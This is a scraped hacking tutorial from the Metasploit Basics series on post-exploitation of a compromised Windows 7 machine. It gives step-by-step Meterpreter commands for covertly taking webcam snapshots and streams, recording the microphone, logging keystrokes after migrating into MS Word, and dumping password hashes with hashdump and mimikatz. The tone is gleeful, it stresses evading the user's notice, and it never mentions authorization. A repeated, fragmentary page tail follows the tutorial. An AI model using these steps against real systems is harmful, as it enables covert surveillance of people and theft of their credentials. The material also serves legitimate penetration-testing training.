Metasploit Basics, Part 15 - Post - Exploitation Fun (Web Cam, Microphone, Passwords and More)

1/31/24, 10:29 AM Metasploit Basics, Part 15: Post- Exploitation Fun (Web Cam, Microphone, Passwords and more)
OTW Oct 16, 2018 7 min read
Metasploit Basics, Part 15: Post- Exploitation Fun (Web Cam,
Microphone, Passwords and more)
Updated: Dec 31, 2022
Welcome back, my fledgling hackers!
As we have progressed through this series on Metasploit Basics, we have used numerous techniques to
exploit your target system including;
1. SMB Exploits (EternalBlue and MS08_067, for instance);

2. File Format (ms14-0440_sandworm, office_word_hta);
3. Browser Exploits (autopwn, Abobe Flash and numerous others);
4. Social Engineering Toolkit(SET);
Custom Payloads with msfvenom;
and many others.
Exploiting the target is just the beginning of the fun! Once we have control of the system, we begin the
post-exploitation phase and this is where we can wreak havoc! In Metasploit terms, modules designed
for post exploitation are referred to as simply post.
https://www.hackers-arise.com/post/2018/10/16/metasploit-basics-part-15-post-exploitation-fun-web-cam-microphone-passwords-and-more 1/13
In this tutorial, we will look at few fun things we can do on the system once we have successfully
exploited the system including;
1. Checking the idletime

2. Turning on and snapping pictures from the web cam as well as web cam streaming
3. Turning on the system microphone to listen
4. Grab the password hashes
5. Use Mimikatz to capture a plethora on information from the target system
The Meterpreter
When exploiting a target with Metasploit, we have many more options for post exploitation if you use
the Meterpreter payload. The Meterpreter is far more than a command line shell. It has additional
functionality that no simple shell can replicate.
The Meterpreter is an advanced payload that uses DLL injection to run entirely in memory (leaving no
trace on the hard drive) . This special payload has a large collection of built-in commands and scripts.
For a complete look at these commands and scripts, see the following posts here on Hackers-Arise.
Ultimate List of Meterpreter Scripts
Ultimate List of Meterpreter Commands
Not all of the commands and scripts will work with every Meterpreter on every operating system. Many
of them are designed for use only on Windows systems.
Types of Meterpreter Payloads
The Meterpreter is not a single payload. There are numerous Meterpreter payloads, usually one for
each type of operating system or target. In addition, you can select Meterpreters that connect over a
raw TCP connection, HTTP or HTTPS. In many cases, to get past firewall restrictions on outbound
traffic, it will be necessary to use HTTP or HTTPS Meterpreters where the connection will appear as
normal outbound Internet traffic and likely be allowed to pass.
To find these Meterpreters, we can use the search function in Metasploit filtering for the type of module
(type:payload), platform (platform:windows) and containing the keyword meterpreter. When we hit
enter, we see the results below.
msf > search type:payload platform:windows meterpreter
As you can see above, there are innumerable meterpreter payloads. I have circled three that work with
x64 Windows OS's and connect back with a raw TCP connection, HTTP (port 80) and HTTPS (port 443).
Step #1 Explore Post Modules
Once we have exploited the system, we can then begin to use the post exploitation commands and
modules. We can find these post exploitation modules by using the search function again and filter for
module type "post".
msf > search type:post
To be more specific, we can filter for those that can used on a compromised Windows system.
msf> search type:post platform:windows
In addition to these post exploitation modules, the meterpreter enables you to use railgun, a post
exploitation feature that enables you to control the target machine's Windows API. I'll do another
tutorial on Railgun further in this series, Metasploit Basics.
Now that we have introduced you a bit to the meterpreter payload, let's take a look at some of things
we can do with it.
Here we will be assuming that we have exploited a Windows 7 system with EternalBlue.
Step #2 Idletime
Often, one of the first things we want to do is to find out how long the system has been idle. This will
give us an indication of whether anyone is presently working on the computer.
meterpreter > idletime
As you can see, the user has been idle on this system for just 7 minutes and 44 seconds. That probably
means that they are nearby. When using the standard meterpreter, you are virtually invisible to the
user, so no need to worry about detection (VNC payloads require the use of the mouse and this would
obviously be noticed by a user on their system).
Step #2 Access their Web Cam
Once we have exploited the system with EternalBlue, we have system admin (GUID=500) privileges
which means we have free run of the computer. This means we can do just about anything we want.
Let's assume we want to take periodic webcam shots from the user's webcam. The first step is to use
the meterpreter command webcam_list to find out what webcams are on the system, if any.
meterpreter > webcam_list
As we can see, there is just one web cam on this system "HP Truevision HD".
Next, we simply need to use another meterpreter command, webcam_snap, to take snapshots from the
compromised system's webcam.
meterpreter > webcam_snap
If the system had more than one webcam, we can indicate the webcam we want to capture from by
using -i switch followed by the number of the webcam. So, if we wanted to capture from webcam #2,
we would enter;
meterpreter > webcam_snap -i 2
After taking the snapshot, the Meterpreter stores the image with a random filename ending in .jpeg. If
they happen to be at their computer, you will receive a picture of them. You will now need to open that
picture with a graphics or photo application from your attack system.
Let's open that .jpeg and see who is on that system.
Looks like you were very lucky!
Even better, we can get the webcam to stream video for us.
meterpreter > webcam_stream
After executing the command, the Meterpreter will open your default web browser and stream the
video from the target's webcam to your system.
Step #3: Plant a Bug on Their Computer (Listen to the Microphone)
In addition to taking snapshots from the webcam, you can also enable the microphone built into the
system and listen to conversations within reach of the microphone. Once again, the Meterpreter has a
built-in command for doing so called record_mic.
meterpreter > record_mic
As you can see, when we run this command, it records the ambient sounds near the computer and
places them in a .wav file in the root user's directory with a random file name.
This meterpreter command has numerous options that can be useful. For instance;
-d : the number of seconds to record (default = 1)

-f : The wav file path.
-p : Automatically play the captured audio, by default ‘true’.
Now, we can construct a useful command that records 10 seconds of audio, creates a .wav file named
spyaudio.wav and automatically plays back the audio through your systems speakers
meterpreter > record_mic -d 10 -f spyaudio.wav -p true
Step #4 Keylogging
Although not as effective as a hardware keylogger, the meterpreter can place a software keylogger on
the system to capture all the keystrokes from one application. The key here is that we can only capture
the keystrokes of one process or application at a time.
To do so, we need to move (migrate) the meterpreter to a process where we expect the target will be
entering data. This might be a web browser, MS Word, Outlook, etc.
First, we need to Process ID of the application. From the meterpreter shell, you can simply type ps. This
will list all the processes running similar to the way the ps command works in Linux.
meterpreter > ps
Once you have identified the application you want to place your keylogger on, you need to migrate the
meterpreter to that process.
meterpreter > migrate 2308
As you can see, we have migrated to process 2308 (yours will likely be different), which in this case is
MS Word.
Next, we start the keylogger with the command keyscan_start.
meterpreter > keyscan_start
The keylogger has now started and is placing all the keystrokes from that application into a
buffer(keystrokes include all characters including returns, backspaces, etc.).
When we want recover the keystrokes, we simply use the command keyscan_dump.
meterpreter >keyscan_dump
Looks like he has some ill-intentions!
Step #4 Dump the System Password Hashes
Once we are inside the system with system admin privileges, we can also access all of the password
hashes on the system. The meterpreter has a simple way to do by simply entering the hashdump
command.
msf > hashdump
As you can see, the target system has dumped all the password hashes to my screen. Of course, we will
still need to crack these hashes with a tool such as hashcat.
Step #5 Access System Information and Passwords with mimikatz
Mimikatz was developed by gentile kiwi as a standalone program for extracting key information from
RAM from a running system. A few years back, it was ported for Metasploit as a post exploitation
module so that we can do the same after exploiting our target.
The first step is to make certain we have system admin privileges. If not, we can use the meterpreter
command, getsystem, to escalate privileges.
meterpreter > getsystem
To make certain we have admin privileges we can query the system with getuid
meterpreter > getuid
Now that we are certain we have system admin privileges on the target system, we can load mimikatz.
meterpreter > load mimikatz
Next, let's get a help screen next.
meterpreter > help mimikatz
Now, we can get the password hashes by running the command.
meterpreter > mimikatz_command -f samdump::hashes
For more on mimikatz, check out my mimikatz article here.
Conclusion
Once we have compromised a system with Metasploit and the meterpreter payload, the fun begins!
They are innumerable meterpreter commands and post-exploitation modules that we can use to
manage and manipulate the target system.
If you are looking to become a Metasploit Expert, check out our upcoming Metasploit Basics for
Hackers.
Also, look for my upcoming book "Metasploit Basics for Hackers" coming out late 2021.

Metasploit Basics, Part 15 - Post - Exploitation Fun (Web Cam, Microphone, Passwords and More)

Uploaded by

Document Informationclick to expand document information

Copyright:

Available Formats

Metasploit Basics, Part 15 - Post - Exploitation Fun (Web Cam, Microphone, Passwords and More)

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Metasploit Basics, Part 15 - Post - Exploitation Fun (Web Cam, Microphone, Passwords and More)

Uploaded by

Copyright:

Available Formats

1/31/24, 10:29 AM Metasploit Basics, Part 15: Post- Exploitation Fun (Web Cam, Microphone, Passwords and more)

OTW Oct 16, 2018 7 min read

Metasploit Basics, Part 15: Post- Exploitation Fun (Web Cam,

Microphone, Passwords and more)

Updated: Dec 31, 2022

Welcome back, my fledgling hackers!

1. SMB Exploits (EternalBlue and MS08_067, for instance);

and many others.

1. Checking the idletime

Ultimate List of Meterpreter Scripts

Ultimate List of Meterpreter Commands

Types of Meterpreter Payloads

msf > search type:payload platform:windows meterpreter

Step #1 Explore Post Modules

msf > search type:post

msf> search type:post platform:windows

meterpreter > idletime

Step #2 Access their Web Cam

meterpreter > webcam_list

meterpreter > webcam_snap

meterpreter > webcam_snap -i 2

Let's open that .jpeg and see who is on that system.

Looks like you were very lucky!

meterpreter > webcam_stream

Step #3: Plant a Bug on Their Computer (Listen to the Microphone)

meterpreter > record_mic

-d : the number of seconds to record (default = 1)

meterpreter > record_mic -d 10 -f spyaudio.wav -p true

meterpreter > migrate 2308

Next, we start the keylogger with the command keyscan_start.

meterpreter > keyscan_start

Looks like he has some ill-intentions!

Step #4 Dump the System Password Hashes

msf > hashdump

Step #5 Access System Information and Passwords with mimikatz

meterpreter > getsystem

meterpreter > getuid

meterpreter > load mimikatz

Next, let's get a help screen next.

meterpreter > help mimikatz

Now, we can get the password hashes by running the command.

meterpreter > mimikatz_command -f samdump::hashes

For more on mimikatz, check out my mimikatz article here.

manage and manipulate the target system.

You might also like